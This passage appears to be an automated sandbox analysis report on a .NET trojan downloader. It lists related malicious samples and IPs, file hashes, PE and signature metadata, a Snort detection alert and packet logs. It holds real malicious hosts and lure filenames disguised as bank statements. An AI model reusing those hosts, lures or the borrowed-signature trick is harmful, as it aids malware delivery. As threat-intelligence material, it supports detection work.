                                                                                      gDi307GEL8.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      b3qxSkoyqZ.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      seEj6LCl8Q.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      www.augusta.brokerSecuriteInfo.com.Win32.PWSX-gen.6803.9731.exeGet hashmaliciousBrowse
                                                                                      • 52.60.87.163
                                                                                      DOC-04102022-58454857453739.exeGet hashmaliciousBrowse
                                                                                      • 52.60.87.163

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      HETZNER-ASDESecuriteInfo.com.Trojan.DownloaderNET.346.2603.24761.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      mofcomp.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.93
                                                                                      V06R3i6PE0.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      ziprar.exeGet hashmaliciousBrowse
                                                                                      • 168.119.254.45
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 195.201.251.151
                                                                                      z7a2WI5YjS.exeGet hashmaliciousBrowse
                                                                                      • 144.76.120.25
                                                                                      3jT1gxz7rh.exeGet hashmaliciousBrowse
                                                                                      • 144.76.101.157
                                                                                      j6peG4zHVu.exeGet hashmaliciousBrowse
                                                                                      • 176.9.247.226
                                                                                      5bj2h0ltLf.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      iCfznvcw9F.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      XRbCp6y2ef.exeGet hashmaliciousBrowse
                                                                                      • 195.201.56.70
                                                                                      FsXr78fNrX.exeGet hashmaliciousBrowse
                                                                                      • 95.217.102.123
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.93
                                                                                      nU6RI2laJn.exeGet hashmaliciousBrowse
                                                                                      • 138.201.93.56
                                                                                      uuctgqafmcr.exeGet hashmaliciousBrowse
                                                                                      • 46.4.13.92
                                                                                      KqQWwMb78H.exeGet hashmaliciousBrowse
                                                                                      • 95.217.30.31
                                                                                      zPy5iNStVs.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      fXsvbNiWbA.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      WorU0yNg1Q.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      TPVmfH41Wp.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Trojan.DownloaderNET.346.2603.24761.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      mofcomp.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      ScrCons.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      file.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      qN1Mxzbjp4.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      Update_0129863793.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      BXa7oZsKkN.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      SlzaBDG8xr.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      ZDcnkBNzYy.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      Kko3TsjBcX.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      96kH1bcgkR.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      IMG#U007e37645467849-49874647894.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      z7a2WI5YjS.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      W1sjpw8Zgv.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      bTEDQ4OX4P.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      Halkbank_Ekstre_20221004_08.pdf.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      Halkbank_Ekstre_20221008_074245_088458.pdf.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      Halkbank_Ekstre_20221004_08.pdf.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      j6peG4zHVu.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):847
                                                                                      Entropy (8bit):5.35816127824051
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                                                      MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                                                      SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                                                      SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                                                      SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

                                                                                      C:\Users\user\AppData\Local\Temp\d01F736L

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wlanext.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.2880737026424216
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                                                      MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                                                      SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                                                      SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                                                      SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):6.897633302217378
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      File size:74592
                                                                                      MD5:3e26dd2ef6dc0be5838e1eac6b668846
                                                                                      SHA1:85581b892756aeb1c453f34464b1f40fa92ff91e
                                                                                      SHA256:221207a0c2f44d04a8c605e5ab6f4585d683daf11671dc6b9fb6a12e3214769a
                                                                                      SHA512:2190a265de805391211ebd3ee1163bbd5796a5b848dea27b4cfee8f161cf9fa2fa595f5ad60ac797792b74157f41039e9405ee79a271a5a41113c897e50fb578
                                                                                      SSDEEP:1536:sTey149ULHmpga/eHUTQQQQQQQBdBgN6b5/2kWSC6WLrxtDvas:Ye4tLGpga/eHUTQQQQQQkdBft/2YWLrD
                                                                                      TLSH:4F737D46C7D10423D96A8A72B0D396C72BB0B20D5DD14AA795CCB01A0ECF38A759BBDD
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.Dc.................R...........p... ........@.. .......................@............`................................

                                                                                      File Icon

                                                                                      Icon Hash:a289a9ed6da39200

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x40709e
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6344A74D [Mon Oct 10 23:14:21 2022 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Authenticode Signature

                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                      Error Number:-2146869232
                                                                                      Not Before, Not After
                                                                                      • 1/22/2021 1:00:00 AM 1/31/2024 12:59:59 AM
                                                                                      Subject Chain
                                                                                      • CN=Bandicam Company Corp., O=Bandicam Company Corp., L=Yeongdeungpo-gu, S=Seoul, C=KR
                                                                                      Version:3
                                                                                      Thumbprint MD5:87EC13ABB46E9384ACEB84E7BE31DC36
                                                                                      Thumbprint SHA-1:307EF8A02A0FC9032591C624624FA3531C235AA1
                                                                                      Thumbprint SHA-256:7512A4A15250B230CDD78826545B01110FC28B13A5681C1B5C3A6B49A5D60982
                                                                                      Serial:0D261C8470ADBB65800CEAF3EAC70819

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x70440x57.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x83ce.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xda000x4960.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x45680x1c.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x50a40x5200False0.5055259146341463data5.5441165013764IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x80000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0xa0000x83ce0x8400False0.5892518939393939data6.8496543545574315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0xa1cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                                                                                      RT_ICON0xa6340x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352
                                                                                      RT_ICON0xb75c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792
                                                                                      RT_ICON0xddc40x40a2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                      RT_GROUP_ICON0x11e680x3edata
                                                                                      RT_VERSION0x11ea80x33cdata
                                                                                      RT_MANIFEST0x121e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      144.76.136.153192.168.2.4443497002018856 10/11/22-05:55:40.046635TCP2018856ET TROJAN Windows executable base64 encoded44349700144.76.136.153192.168.2.4

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 11, 2022 05:55:38.154259920 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.154321909 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:38.154426098 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.277542114 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.277620077 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:38.372533083 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:38.372735977 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.380182981 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.380220890 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:38.380616903 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:38.422298908 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.798943043 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:38.799014091 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268387079 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268449068 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268467903 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268503904 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268556118 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268708944 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.268708944 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.268708944 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.268806934 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268847942 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268872023 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.268903017 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.268923044 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.268942118 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.292177916 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.292236090 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.292342901 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.292397976 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.292434931 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.292463064 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.292643070 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.292692900 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.292726040 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.292748928 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.292771101 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.292800903 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.293066978 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.293112040 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.293150902 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.293171883 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.293193102 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.293229103 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.315697908 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.315768003 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.315871000 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.315917015 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.315957069 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316019058 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316404104 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.316452026 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.316497087 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316517115 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.316546917 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316582918 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316741943 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.316787004 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.316831112 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316852093 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.316910982 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.316950083 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317111015 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317156076 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317257881 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317281008 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317349911 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317395926 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317441940 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317487001 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317513943 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317554951 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317585945 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317689896 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317735910 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317800999 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.317823887 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.317864895 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.318016052 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.318444014 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.341468096 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.341523886 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.341643095 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.341685057 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.341712952 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.341756105 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.341834068 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.341860056 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.341909885 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.341922998 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.341954947 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.341976881 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.342355013 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.342379093 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.342437029 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.342448950 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.342472076 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.342506886 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.342900991 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.342931032 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.342998028 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.343017101 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.343041897 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.343070030 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.343317986 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.343415022 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.343439102 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.343466043 CEST44349699144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.343534946 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.347095966 CEST49699443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.358638048 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.358705997 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.358824015 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.359340906 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.359373093 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.451102972 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:39.460383892 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:39.460426092 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:40.046730042 CEST44349700144.76.136.153192.168.2.4
